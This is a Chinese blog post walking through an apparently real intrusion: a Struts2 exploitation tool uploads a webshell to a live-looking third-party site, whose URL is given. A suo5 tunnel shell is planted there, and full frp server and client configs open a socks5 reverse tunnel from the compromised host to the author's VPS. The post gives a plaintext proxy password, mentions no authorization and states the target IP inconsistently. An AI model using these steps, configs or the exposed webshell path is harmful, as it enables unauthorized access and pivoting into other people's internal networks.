阿一网络安全实战——利用Struts2搭建socks5隧道进内网

已于 2024-05-30 15:34:48 修改
阅读量418 收藏 5
点赞数 4
文章标签: 网络
于 2024-05-29 16:38:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ayixy/article/details/139299246
版权
1.suo5 隧道进内网
利用 struts2 检测工具,将我们的 webshell 上传至当前路径下
ip 92.158.169.6 ,并且该台机器可以出网
根据刚刚上传的 webshell 路径,我们在该路径下上传一个 ttt.jsp(suo5 的马 )
suo5 工具连接
http://stil.taxi-burgas.com/ttt.jsp
proxy 代理工具新建一个代理,设置为刚刚 suo5 的代理地址和端口
在代理规则里面将我们需要代理的软件添加进去
tscan 只扫出来开放了两个端口
systemd-detect-virt 返回的不是 none ,应该是台虚拟机
2.frp 搭建隧道进内网
因为我的这个目标是 linux 系统的,所以下载了 frp_0.58.0_linux_amd64 版本的 frp
对应的文件如下,接下来开始部署 frp
将服务端设置在 vps 上,并且对 frps frps.toml 这两个文件赋予可执行权限
frps.toml 配置文件的具体内容如下
/**************************/
[common]
bind_addr = 0.0.0.0
bind_port = 7800
token = xxxxx( 服务端和客户端的 token 要一致 )
dashboard_addr = 0.0.0.0
dashboard_port = 7500
dashboard_user = xxxxx
dashboard_pwd = xxxxx
/**************************/
然后用 frps -c frps.toml 运行(这个运行因为要加载配置文件,所以后面要加 -c frps.toml
接下来部署客户端
frpc.toml frpc 用冰蝎上传至一开始上传 webshell 同级目录下(之前传其他地方都运行不了)
其中 frpc.toml 配置文件具体内容如下
/**************************/
[common]
server_addr = (vps 的公网 ip 地址 )
server_port = 7800
token = xxxxx
protocol = tcp
tls_enable = true
disable_custom_tls_first_byte = true
[socks]
type = tcp
remote_port = 1080
plugin = socks5
plugin_user = admin
plugin_passwd = 530nannan
use_encryption = true
use_compression = true
/**************************/
然后还是同样的先要赋予程序可执行权限
然后运行的时候也要加载 frpc.toml 这个配置文件
在目标机上用 ./frpc -c ./frpc.toml 运行客户端以后,我们的服务端就可以看到已经建立完成了
用扫描工具去扫 95.158.169.6
网安大队长阿一
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Suo5-HTTP 代理隧道工具
Birdman-one的博客
03-03 3732
suo5 是一个全新的 HTTP 代理隧道,基于 HTTP/1.1 的 Chunked-Encoding 构建。相比 Neo-reGeorg 等传统隧道工具, suo5 的性能可以达到其数十倍。
内网渗透测试:利用 RDP 协议搭建 Socks5 代理隧道
qq_44005305的博客
07-29 464
如今,在很多组织机构内部,针对 DMZ 或隔离网络区域内的计算机设备,为了限制其它接入端口风险,通常只允许这些设备开启 3389端口,使用远程桌面来行管理维护。那么我们能不能利用这个 3389 端口的 RDP 服务建立起一条通向内网的代理隧道呢?当然可以,下面就引出我们今天的主角文中若有不当之处,还请各位大佬师傅们多多点评。
使用frp配置搭建内网(穿透)教程,frp-0.58.1实现外网访问
最新发布
zhangxiaoquan2016的博客
06-04 3403
Windows 与 Centos 最新的FRP内网穿透服务的实战教程,志在解决由于局域网测试版本系统无法实现外网访问的弊端。至此,搭建内网穿透教程就已经完成了,已经将本地Linux系统的web服务通过Windows服务器转发至Internet行大家访问了。弹出命令窗口后,在命令窗口中输入如下命令,显示frps started successfully ,证明启动成功。在本教程中,我们将介绍如何在设备上搭建 FRP,以实现内网穿透功能,让你能够方便地访问本地文件或服务。
某客户单位模拟应急演练(双网卡状态下,Socks5隧道搭建内网攻击)
一只爱吃橙子的羊
09-10 1529
frp隧道搭建内网扫描
frp内网穿透(socks隧道)
2301_76227305的博客
03-06 3816
在实验过程中还是遇到了挺多的问题,但好在大多都解决了。不过还是遗留了一些不懂的问题,等以后再慢慢研究了。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
从零实现加密隧道(二):socks5 协议详解
cccccccj
03-21 8089
socks的文档:https://www.ietf.org/rfc/rfc1928.txt SOCKS5 是一种网络传输协议,主要用于客户端与外网服务器之间通讯的中间传递。SOCKS 是 "Sockets"的缩写。 SOCKS5 工作在比 HTTP 代理更低的层次。 是一个代理协议,它在使用TCP/IP协议通讯的前端机器和服务器机器之间扮演一个中介角色,使得内部网中的前端机器变得能够访问Internet网中的服务器,或者使通讯更加安全。SOCKS5 服务器通过将前端发来的请求转发给真正的目标服务器,模拟了一
阿一鲍鱼-阿一鲍鱼1980.docx
11-25
阿一鲍鱼-阿一鲍鱼1980.docx
谓词归结逻辑第三版,彻底修改错误,此处特别鸣谢阿一同学的监工与验收
03-13
人工智能实验
Oracle 11R2 官方文档(中英对照版,PDF)
03-16
Oracle 11gR2是Oracle数据库的一个重要版本,提供了许多高级特性和功能。这份官方文档的中英对照版详细阐述了Oracle数据库的核心概念和技术,包括其体系结构、索引、数据完整性和并发控制等关键方面。以下是对这些...
专题课件完美版(2021-2022年)南昌赣江新天地项目品牌推广策略案76PPT九天机构.ppt
10-01
此外,高端定位的四星酒店——香港怡和假日酒店,以及阿一鲍鱼、芭蕉叶餐厅等知名品牌的入驻,为项目带来了高人气和良好的口碑。 然而,赣江新天地的目标并不仅仅是一次性的吸引力,而是寻求长期的经营与品牌忠诚度...
办公用品价格与清单.doc
09-21
1. 签字笔:如晨光阿一中性笔,GP150必胜中性笔等,它们通常以0.5mm或0.7mm的笔尖尺寸提供,盖帽式设计便于携带,部分款式如GP1530具有超大容量,经济实惠。 2. 宝珠笔:英雄257宝珠笔是中国制笔品牌的代表,适合...
http-tunnel(隧道)
01-22
QQ上网代理,能够在突破端口限制!!!!!!!!!!!!!!!!!
【漏洞复现】Apache Struts CVE-2023-50164
zkaqlaoniao的博客
12-20 790
近日,Struts2 官方披露 CVE-2023-50164 Apache Struts 文件上传漏洞,攻击者可利用该漏洞污染相关上传参数导致目录遍历,在具体代码环境中可能导致上传 Webshell,执行任意代码。Struts2 官方披露 CVE-2023-50164 Apache Struts 文件上传漏洞,攻击者可利用该漏洞污染相关上传参数导致目录遍历,在具体代码环境中可能导致上传 Webshell,执行任意代码。
suo5代理
守护万家灯火
04-25 386
流量数据:双chunked,Transfer-Encoding: chunked。HTTP中的chunk数据|300d0a0d0a|在客户端启动程序:输入连接地址。
内网安全——代理技术Socks5&网络通讯&控制上线
m0_61506558的博客
01-26 1025
主机出站TCP封杀,入站没有并且无互联网网络,可以尝试正向连接(取得一台有网络的能和主机通信的服务器权限,它有网),把数据给出网的机器,通过出网机器正向主动控制它。主机出站TCP被封杀,入站没有并且有互联网,可以尝试正向连接(取得一台有网络的能和主机通信的服务器权限,它有网),或者使用隧道技术(走其他协议出网即可)常规的渗透测试的流程,第二步是解决如何拿到权限,是横向移动的内容,这样先不介绍,入第三部,解决如何行控制。再添加节点,ip地址为本机外网服务器地址,端口为刚刚在msf设置的port。
http隧道
05-19 4302
简介 http隧道是通过上传特定脚本到网站目录行解析,配合本地工具即可搭建隧道的方式,这种方式同样可以直达内网,这种方式复用了网站的端口,无需再开新的端口和担忧防火墙规则对流量的拦截,下面将介绍几个常见的http隧道工具。 个人的工具箱有一段时间没更新了,但是所有工具的用法其实也大同小异,想要新工具可以去github搜索一下,很多的。 冰蝎 冰蝎是一种webshell管理工具,但是他上传shell同样可以行流量的代理,实现部分对内网的流量转发功能。看面板的话新版本的冰蝎比之前的功能更加强大了 首先我们
nps+Proxifier搭建socks5代理隧道内网穿透
热门推荐
good good study
01-28 1万+
在渗透过程中,我们需要快速实现内网穿透,从而绕过网络访问限制,直接从外网来访问内网 正向代理,服务器不出网。如拿下的web服务器,我们在上面ping baidu.com是ping不通的,即服务器不出网,此时需要使用正向代理工具 反向代理,服务器出网。如拿下的web服务器,我们在上面ping baidu.com是能ping通的,即服务器能出网,此时可以使用反向代理工具 实验环境搭建 nps NPS工具由NPS服务器端和NPS客户端组成,我们一般将NPS服务器端放在具有公网IP的VPS上,并
vulhub-Struts2-045(CVE-2017-5638)漏洞复现
m0_62008601的博客
07-31 1686
struts2重要漏洞之一
python GUI库推荐
07-28
对于Python的GUI开发,有几个主流的库可供选择。以下是一些常用的Python GUI库推荐: 1. Tkinter:Tkinter是Python的标准GUI库,易于学习和使用。它提供了丰富的GUI组件和布局管理器,适用于快速创建简单的图形界面。 2. PyQt:PyQt是Python绑定了Qt框架的GUI库。它提供了丰富的GUI组件和功能,并具有强大的跨平台特性。PyQt使用C++编写,因此其性能较好。 3. PySide:PySide是另一个Python绑定了Qt框架的GUI库,与PyQt类似,但其授权方式更加开放。PySide适用于创建跨平台的图形界面。 4. wxPython:wxPython是Python绑定了wxWidgets库的GUI库,提供了丰富的GUI组件和布局管理器。它具有良好的跨平台支持,并且可以与其他编程语言行集成。 这些GUI库各有优缺点,选择适合自己需求和喜好的库行开发。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值